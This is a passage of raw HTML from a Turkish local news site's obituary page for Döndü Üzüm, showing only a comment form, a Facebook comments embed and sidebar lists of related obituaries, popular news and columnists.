        </a>
      </div>
            <div class="span3">
        <a href="https://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler">
          <img src="https://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" />
          <b>Otomobilde yanarak can verdiler</b>
        </a>
      </div>
          </div>
  </div>
  
  <div id="yorumyap" style="margin:0"></div>
  <div class="clearfix keywords"><div class="title">Anahtar Kelimeler:</div><a href="https://www.elbistaninsesi.com/haberleri/D%C3%B6nd%C3%BC+%C3%9Cz%C3%BCm+87+ya%C5%9F%C4%B1nda" title="Döndü Üzüm 87 Yaşında haberleri">Döndü Üzüm 87 Yaşında</a></div>
      <section>
              <div id="yorumlar">
            <ul class="nav nav-tabs" id="ytab">
              <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">0</span></a></li>
               <li><a href="#facebookpanel" class="fbyorum hs-sdch" data-toggle="tab">Facebook Yorumları <span class="label label-inverse"><fb:comments-count href="https://www.elbistaninsesi.com/vefatlar/dondu-uzum-87-yasinda-h73200.html">0</fb:comments-count></span></a></li>            </ul>

            <div class="tab-content">
                              <div class="tab-pane active" id="yorumpanel">
                                    <div class="yorumlar panel">
                    <div id="yorumpaneli" class="row-fluid">
                    <form  name="comment" class="comment_form" id="addcomment">
                        <div class="span1">
                                                        <img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" class="img-rounded"/>                        </div>
                        <div class="span11">
                            <div class="row-fluid">
                                <div class="input-prepend span6">
                                    <span class="add-on">Adınız</span>
                                    <input name="isim"  class="span10 adsoyad" type="text"  id="adsoyad" size="30" maxlength="50"  title="Ad soyad gerekli!" />
                                </div>
                            </div>
                            <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" placeholder="Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!"></textarea>
                            <div class="span12" style="margin:0;">
                            <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div>
                            <a href="javascript:void(0)" onclick="javascript:comment_send(73200);return false;" class="btn hs-sdch btn-warning pull-right">Yorum Gönder</a>
                            <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div>
                        </div>
                        <input type="hidden" name="hid" value="73200" />
                        <input type="hidden" name="uid" value="0" />
                        <input type="hidden" name="tip" value="haber" />
                        <input type="hidden" name="cevap" value="" class="answer" />
                        <input type="hidden" name="cevap_id" value="0" class="cevap_id" />
                        <input type="hidden" name="token" value="cad4d01fe21ea6feed3314a1b4e230b6be230f4e" />

                    </form>
                    </div>
                    <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div>
                </div>
                <div class="alert alert-block alert-error fade in" style="display:block;margin-top:15px;">
                    <button type="button" class="close" data-dismiss="alert">×</button>
                    <strong>Dikkat!</strong> Suç teşkil edecek, yasadışı, tehditkar, rahatsız edici, hakaret ve küfür içeren, aşağılayıcı, küçük düşürücü, kaba, müstehcen, ahlaka aykırı, kişilik haklarına zarar verici ya da benzeri niteliklerde içeriklerden doğan her türlü mali, hukuki, cezai, idari sorumluluk içeriği gönderen Üye/Üyeler’e aittir.                </div>
            

            
            
            </div> <!-- .tab-pane -->

                          <div class="tab-pane yorumlar fbpanel" id="facebookpanel">
                <div class="row-fluid">
                  <div id="fb-root"></div>
                  <script>(function(d, s, id) {
                    var js, fjs = d.getElementsByTagName(s)[0];
                    if (d.getElementById(id)) return;
                    js = d.createElement(s); js.id = id;
                    js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1";
                    fjs.parentNode.insertBefore(js, fjs);
                  }(document, 'script', 'facebook-jssdk'));</script>
                  <div class="fb-comments" data-href="https://www.elbistaninsesi.com/vefatlar/dondu-uzum-87-yasinda-h73200.html" data-width="603" data-colorscheme="light" data-numposts="10"></div>
                </div> <!-- #facebookpanel -->
              </div>
            
          </div> <!-- .tab-content -->

        </div> <!-- #yorumlar -->
    </section>
  
          </div>

                <!-- Sağ Blok -->
        <div id="sidebar" class="sidebar span4">
          
          
  
  
    <!-- ILGILI HABERLER  -->
  <div id="ilgiliHaberler-y">
    <div class="ilgiliHaberler-y-t glyphicons white show_big_thumbnails hs-bgc text-uppercase">İlgili Haberler</div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/vefatlar/mustafa-atasayar-70-yasinda-h73191.html"  title="Mustafa Atasayar 70 Yaşında">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/mustafa_atasayar_70_yasinda_h73191_9c831.jpg" alt="Mustafa Atasayar 70 Yaşında" />
        <span>Mustafa Atasayar 70 Yaşında</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/vefatlar/mediha-ozesmer-85-yasinda-h73173.html"  title="Mediha Özesmer 85 yaşında">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/mediha_ozesmer_85_yasinda_h73173_219a4.jpg" alt="Mediha Özesmer 85 yaşında" />
        <span>Mediha Özesmer 85 yaşında</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/vefatlar/mehmet-ceren-h73172.html"  title="Mehmet Ceren">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/mehmet_ceren_h73172_31500.jpg" alt="Mehmet Ceren" />
        <span>Mehmet Ceren</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/vefatlar/ali-ihsan-sakalar-73-yasinda-h73163.html"  title="Ali İhsan Şakalar 73 yaşında">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/ali_ihsan_sakalar_73_yasinda_h73163_d2df6.jpg" alt="Ali İhsan Şakalar 73 yaşında" />
        <span>Ali İhsan Şakalar 73 yaşında</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/vefatlar/abidin-turkmen-66-yasinda-h73162.html"  title="Abidin Türkmen 66 yaşında">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/abidin_turkmen_66_yasinda_h73162_450f7.jpg" alt="Abidin Türkmen 66 yaşında" />
        <span>Abidin Türkmen 66 yaşında</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/vefatlar/anma-cevahir-gok-h73160.html"  title="Anma / Cevahir Gök">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/anma_cevahir_gok_h73160_64758.jpg" alt="Anma / Cevahir Gök" />
        <span>Anma / Cevahir Gök</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/vefatlar/hatice-gul-79-yasinda-h73159.html"  title="Hatice Gül 79 yaşında">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/hatice_gul_79_yasinda_h73159_40d7c.jpg" alt="Hatice Gül 79 yaşında" />
        <span>Hatice Gül 79 yaşında</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/vefatlar/kadir-dogan-75-yasinda-h73150.html"  title="Kadir Doğan 75 yaşında">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/kadir_dogan_75_yasinda_h73150_31335.jpg" alt="Kadir Doğan 75 yaşında" />
        <span>Kadir Doğan 75 yaşında</span>
      </a>
    </div>
      </div>

  
  <!-- EGAZETE -->
  <div class="egazete">
    <div class="header">
      <h5>E-Gazete</h5>
    </div>
    <div class="content">
            <a href="https://www.elbistaninsesi.com/images/sayfalar/14-Mart-2022-son.jpg" title="Elbistanın Sesi - 14.03.2022 Manşeti" target="_blank"><img src="https://www.elbistaninsesi.com/images/sayfalar/thumb_14-Mart-2022-son.jpg" alt="Elbistanın Sesi - 14.03.2022 Manşeti" /></a>
           </div>
  </div>

  
  <!-- SOSYAL  -->
  <div class="hs-sosyal clearfix">
      <div class="hs-box hs-facebook">
        <div class="top">
          <div class="icon"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div>
          <div class="right">
            <span class="count"><a href="https://facebook.com/elbistaninsesi" class="hs-sdch" target="blank" id="likes"></a></span>
            <span class="text">Beğeni</span>
          </div>
        </div>
        <div class="bottom">
          <a href="https://facebook.com/elbistaninsesi" target="blank" class="hs-sdch" rel="nofollow">Facebook'ta Beğen</a>
        </div>
      </div>
      <div class="hs-box hs-twitter">
        <div class="top">
          <div class="icon"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div>
          <div class="right">
            <span class="count"><a href="https://twitter.com/elbistaninsesi" class="hs-sdch" target="blank" id="followers">102</a></span>
            <span class="text">Takipçi</span>
          </div>
        </div>
        <div class="bottom">
          <a href="https://twitter.com/elbistaninsesi" target="blank" class="hs-sdch" rel="nofollow">Twitter'da Takip Et</a>
        </div>
      </div>

      <div class="hs-box hs-youtube">
          <div class="top">
              <div class="icon"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/youtube.png" alt="Youtube"></div>
          </div>
          <div class="bottom">
              <a href="" target="blank" class="hs-sdch" rel="nofollow">Youtube Abone Ol</a>
          </div>
      </div>

      <div class="hs-box hs-instagram">
          <div class="top">
              <div class="icon"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/instagram.png" alt="instagram"></div>
          </div>
          <div class="bottom">
              <a href="" target="blank" class="hs-sdch" rel="nofollow">Instagram Takip</a>
          </div>
      </div>



  </div>

  

  <!-- ENCOKLAR  -->
  <div class="encoklar">
    <div class="accordion">
    	      	<div class="accordion-group">
        	<div class="accordion-heading hs-bgc">
          		<a class="accordion-toggle hs-sdch" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne">
          			<span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5>
				</a>
        	</div>
        	<div id="collapseOne" class="accordion-body collapse in">
          		<div class="accordion-inner">
            		<ul class="en-list">
              		              			<li class="last en-hidden en-visible"><a href="https://www.elbistaninsesi.com/guncel/servis-minibusunun-altinda-kalan-kiz-cocugu-hayatini-kaybetti-h73015.html" title="Servis minibüsünün altında kalan..." class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/02/servis_minibusunun_altinda_kalan_kiz_cocugu_agir_yaralandi_h73015_d4d97.jpg" alt="Servis minibüsünün altında kalan..." ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/guncel/servis-minibusunun-altinda-kalan-kiz-cocugu-hayatini-kaybetti-h73015.html" title="" ><span class="en-hit">1.</span> <strong>Servis minibüsünün altında kalan...</strong> <span class="en-spot en-hidden">Elbistan’da sürücüsünün direksiyon hakimiyetini kaybettiği servis...</span></a></div></li>
              		              			<li class="en-hidden"><a href="https://www.elbistaninsesi.com/guncel/toki-projesinde-215-konutun-satisi-gerceklestirilecek-h72975.html" title="TOKİ projesinde 215 konutun satışı..." class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/02/toki_projesinde_215_konutun_satisi_gerceklestirilecek_h72975_c529c.jpg" alt="TOKİ projesinde 215 konutun satışı..." ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/guncel/toki-projesinde-215-konutun-satisi-gerceklestirilecek-h72975.html" title="" ><span class="en-hit">2.</span> <strong>TOKİ projesinde 215 konutun satışı...</strong> <span class="en-spot en-hidden">Toplu Konut İdaresi Başkanlığı (TOKİ), Elbistan’da inşası süren...</span></a></div></li>
              		              			<li class="en-hidden"><a href="https://www.elbistaninsesi.com/guncel/13-yasindaki-cocuk-yataginda-olu-bulundu-h72993.html" title="13 yaşındaki çocuk yatağında ölü..." class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/02/13_yasindaki_cocuk_yataginda_olu_bulundu_h72993_2a111.jpg" alt="13 yaşındaki çocuk yatağında ölü..." ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/guncel/13-yasindaki-cocuk-yataginda-olu-bulundu-h72993.html" title="" ><span class="en-hit">3.</span> <strong>13 yaşındaki çocuk yatağında ölü...</strong> <span class="en-spot en-hidden">Elbistan’da, yatağında ölü bulunan 13 yaşındaki kız çocuğunun...</span></a></div></li>
              		              			<li class="en-hidden"><a href="https://www.elbistaninsesi.com/guncel/bugday-ve-arpa-ureticisine-ek-destek-h73129.html" title="Buğday ve arpa üreticisine ek destek" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/bugday_ve_arpa_ureticisine_ek_destek_h73129_cc0b9.jpg" alt="Buğday ve arpa üreticisine ek destek" ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/guncel/bugday-ve-arpa-ureticisine-ek-destek-h73129.html" title="" ><span class="en-hit">4.</span> <strong>Buğday ve arpa üreticisine ek destek</strong> <span class="en-spot en-hidden">Türkiye tarım havzaları üretim ve destekleme modeli kapsamında 2021...</span></a></div></li>
              		              			<li class="en-hidden"><a href="https://www.elbistaninsesi.com/guncel/elbistanli-genc-trafik-kazasinda-yasamini-yitirdi-h73136.html" title="Elbistanlı genç, trafik kazasında..." class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/elbistanli_genc_trafik_kazasinda_yasamini_yitirdi_h73136_689f6.jpg" alt="Elbistanlı genç, trafik kazasında..." ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/guncel/elbistanli-genc-trafik-kazasinda-yasamini-yitirdi-h73136.html" title="" ><span class="en-hit">5.</span> <strong>Elbistanlı genç, trafik kazasında...</strong> <span class="en-spot en-hidden">Muğla&#039;nın Marmaris ilçesinde, kırmızı ışık ihlali yaptığı...</span></a></div></li>
              		            		</ul>
          		</div>
        	</div>
      	</div>
              <div class="accordion-group">
        <div class="accordion-heading hs-bgc">
          <a class="accordion-toggle hs-sdch" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo">
            <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a>
        </div>
        <div id="collapseTwo" class="accordion-body collapse in">
          <div class="accordion-inner">
            <ul class="en-list">
                            <li class="en-hidden en-visible"><a href="https://www.elbistaninsesi.com/vefatlar/sefer-yuzbasi-84-yasinda-h73113.html" title="Sefer Yüzbaşı 84 yaşında," class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/sefer_yuzbasi_84_yasinda_h73113_75adf.jpg" alt="Sefer Yüzbaşı 84 yaşında,"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/sefer-yuzbasi-84-yasinda-h73113.html" title="" ><span class="en-hit">1.</span> <strong>Sefer Yüzbaşı 84 yaşında,</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/gani-yayci-58-yasinda-h73029.html" title="Gani Yaycı 58 yaşında" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/gani_yayci_58_yasinda_h73029_2bf9d.jpg" alt="Gani Yaycı 58 yaşında"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/gani-yayci-58-yasinda-h73029.html" title="" ><span class="en-hit">2.</span> <strong>Gani Yaycı 58 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/fuat-tasan-73-yasinda-h72999.html" title="Fuat Taşan 73 yaşında" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/fuat_tasan_73_yasinda_h72999_b7d06.jpg" alt="Fuat Taşan 73 yaşında"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/fuat-tasan-73-yasinda-h72999.html" title="" ><span class="en-hit">3.</span> <strong>Fuat Taşan 73 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/mustafa-atasayar-70-yasinda-h73191.html" title="Mustafa Atasayar 70 Yaşında" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/mustafa_atasayar_70_yasinda_h73191_9c831.jpg" alt="Mustafa Atasayar 70 Yaşında"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/mustafa-atasayar-70-yasinda-h73191.html" title="" ><span class="en-hit">4.</span> <strong>Mustafa Atasayar 70 Yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/vesibe-kosker-80-yasinda-h73000.html" title="Vesibe Köşker 80 yaşında" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/02/vesibe_kosker_80_yasinda_h73000_be94f.jpg" alt="Vesibe Köşker 80 yaşında"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/vesibe-kosker-80-yasinda-h73000.html" title="" ><span class="en-hit">5.</span> <strong>Vesibe Köşker 80 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                          </ul>
          </div>
        </div>
      </div>
        </div>
  </div>

  
  <!-- YAZARLAR -->
  <div id="syazar" class="hs-yazarlar">
    <div class="header">
      <h5><a href="https://www.elbistaninsesi.com/yazarlar/" title="Yazarlar">Yazarlar</a></h5>
            <a class="control left" href="#" id="syprev"></a>
      <a class="control right" href="#" id="synext"></a>
          </div>
    <div class="content">
      <div class="item">
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/merhaba-bahar-makale,6583.html" title="MERHABA BAHAR" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/yazar_kadın-1.jpg" alt="Nazife YETİŞGEN">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/103/nazife-yetisgen" title="Nazife YETİŞGEN">Nazife YETİŞGEN</a></h4>
              <a href="https://www.elbistaninsesi.com/merhaba-bahar-makale,6583.html" title="MERHABA BAHAR" >MERHABA BAHAR</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/elbistanin-guzide-gencleri-makale,6582.html" title="Elbistan’ın Güzide Gençleri," >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/6faefd20-9b1e-418c-b102-3b2d1b2c5463.jpg" alt="Adnan YILMAZ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/88/adnan-yilmaz" title="Adnan YILMAZ">Adnan YILMAZ</a></h4>
              <a href="https://www.elbistaninsesi.com/elbistanin-guzide-gencleri-makale,6582.html" title="Elbistan’ın Güzide Gençleri," >Elbistan’ın Güzide Gençleri,</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/akran-zorbaligi-makale,6581.html" title="AKRAN ZORBALIĞI" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/tuğba.jpg" alt="Tuğba Arıkan">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/101/tugba-arikan" title="Tuğba Arıkan">Tuğba Arıkan</a></h4>
              <a href="https://www.elbistaninsesi.com/akran-zorbaligi-makale,6581.html" title="AKRAN ZORBALIĞI" >AKRAN ZORBALIĞI</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/gonul-insani-olmak-makale,6580.html" title="GÖNÜL İNSANI OLMAK" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/hamdiyuce.jpg" alt="Hamdi YÜCE">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/106/hamdi-yuce" title="Hamdi YÜCE">Hamdi YÜCE</a></h4>
              <a href="https://www.elbistaninsesi.com/gonul-insani-olmak-makale,6580.html" title="GÖNÜL İNSANI OLMAK" >GÖNÜL İNSANI OLMAK</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/tecrube-ile-sabit-40-makale,6579.html" title="TECRÜBE İLE SABİT -40-" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmet-gozukara_1.jpg" alt="Mehmet Gözükara">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/13/mehmet-gozukara" title="Mehmet Gözükara">Mehmet Gözükara</a></h4>
              <a href="https://www.elbistaninsesi.com/tecrube-ile-sabit-40-makale,6579.html" title="TECRÜBE İLE SABİT -40-" >TECRÜBE İLE SABİT -40-</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/12-mart-baglaminda-darbe-polemikleri-ve-icsel-muhasebe-makale,6578.html" title="12 MART&quot; BAĞLAMINDA DARBE POLEMİKLERİ ve İÇSEL MUHASEBE" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/dr-mustafa-kok_1.jpg" alt="Dr. Mustafa KÖK">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/8/dr-mustafa-kok" title="Dr. Mustafa KÖK">Dr. Mustafa KÖK</a></h4>
              <a href="https://www.elbistaninsesi.com/12-mart-baglaminda-darbe-polemikleri-ve-icsel-muhasebe-makale,6578.html" title="12 MART&quot; BAĞLAMINDA DARBE POLEMİKLERİ ve İÇSEL MUHASEBE" >12 MART&quot; BAĞLAMINDA DARBE POLEMİKLERİ ve İÇSEL MUHASEBE</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/annem-makale,6576.html" title="ANNEM" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/me.jpg" alt="İlhan Akar">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/81/ilhan-akar" title="İlhan Akar">İlhan Akar</a></h4>
              <a href="https://www.elbistaninsesi.com/annem-makale,6576.html" title="ANNEM" >ANNEM</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/gulbeyaz-makale,6575.html" title="GÜL­BE­YAZ" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/eyyupceran_1.jpg" alt="Eyyup Ceran">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/105/eyyup-ceran" title="Eyyup Ceran">Eyyup Ceran</a></h4>
              <a href="https://www.elbistaninsesi.com/gulbeyaz-makale,6575.html" title="GÜL­BE­YAZ" >GÜL­BE­YAZ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/mutluluk-yolu-makale,6574.html" title="MUT­LU­LUK YOLU" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/İsimsiz-1.jpg" alt="Yemliha Gürlek">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/31/yemliha-gurlek" title="Yemliha Gürlek">Yemliha Gürlek</a></h4>
              <a href="https://www.elbistaninsesi.com/mutluluk-yolu-makale,6574.html" title="MUT­LU­LUK YOLU" >MUT­LU­LUK YOLU</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/hayatimla-yarista-hep-yenildim-makale,6573.html" title="HA­YA­TIM­LA YA­RIŞ­TA Hep ye­nil­dim" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Yair_arYkan.jpg" alt="Şahin ARIKAN">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/78/sahin-arikan" title="Şahin ARIKAN">Şahin ARIKAN</a></h4>
              <a href="https://www.elbistaninsesi.com/hayatimla-yarista-hep-yenildim-makale,6573.html" title="HA­YA­TIM­LA YA­RIŞ­TA Hep ye­nil­dim" >HA­YA­TIM­LA YA­RIŞ­TA Hep ye­nil­dim</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/2022-yili-tip-bayramiindan-dolayi-tebrik-makale,6572.html" title="2022 YILI TIP BAYRAMIINDAN DOLAYI TEBRİK" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmet-gocer_1.jpg" alt="Mehmet Göçer">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/4/mehmet-gocer" title="Mehmet Göçer">Mehmet Göçer</a></h4>
              <a href="https://www.elbistaninsesi.com/2022-yili-tip-bayramiindan-dolayi-tebrik-makale,6572.html" title="2022 YILI TIP BAYRAMIINDAN DOLAYI TEBRİK" >2022 YILI TIP BAYRAMIINDAN DOLAYI TEBRİK</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/sizlerden-kutuphaneokul-icin-gelenler-makale,6569.html" title="Sizlerden kütüphane/okul için gelenler" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/1.jpg" alt="Arif  Bilgin">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/1/arif-bilgin" title="Arif  Bilgin">Arif  Bilgin</a></h4>
              <a href="https://www.elbistaninsesi.com/sizlerden-kutuphaneokul-icin-gelenler-makale,6569.html" title="Sizlerden kütüphane/okul için gelenler" >Sizlerden kütüphane/okul için gelenler</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/kendini-bilmeyen-kadini-ne-bilsin-makale,6567.html" title="KENDİNİ BİLMEYEN KADINI NE BİLSİN" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/m-emin-elagoz_1.jpg" alt="M. Emin ELAGÖZ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/7/m-emin-elagoz" title="M. Emin ELAGÖZ">M. Emin ELAGÖZ</a></h4>
              <a href="https://www.elbistaninsesi.com/kendini-bilmeyen-kadini-ne-bilsin-makale,6567.html" title="KENDİNİ BİLMEYEN KADINI NE BİLSİN" >KENDİNİ BİLMEYEN KADINI NE BİLSİN</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/kadinim-makale,6561.html" title="KA­DI­NIM" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/ceritli.jpg" alt="Celal Ceritli">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/95/celal-ceritli" title="Celal Ceritli">Celal Ceritli</a></h4>
              <a href="https://www.elbistaninsesi.com/kadinim-makale,6561.html" title="KA­DI­NIM" >KA­DI­NIM</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/daglar-makale,6559.html" title="DAĞ­LAR" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Nadir-Adbay_499_1.jpg" alt="Mehmet Ayaz">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/6/mehmet-ayaz" title="Mehmet Ayaz">Mehmet Ayaz</a></h4>
              <a href="https://www.elbistaninsesi.com/daglar-makale,6559.html" title="DAĞ­LAR" >DAĞ­LAR</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/oyle-zor-ki-makale,6550.html" title="ÖYLE ZOR Kİ" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/11.jpg" alt="Nusret Yılmaz Külekçi">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/74/nusret-yilmaz-kulekci" title="Nusret Yılmaz Külekçi">Nusret Yılmaz Külekçi</a></h4>
              <a href="https://www.elbistaninsesi.com/oyle-zor-ki-makale,6550.html" title="ÖYLE ZOR Kİ" >ÖYLE ZOR Kİ</a>
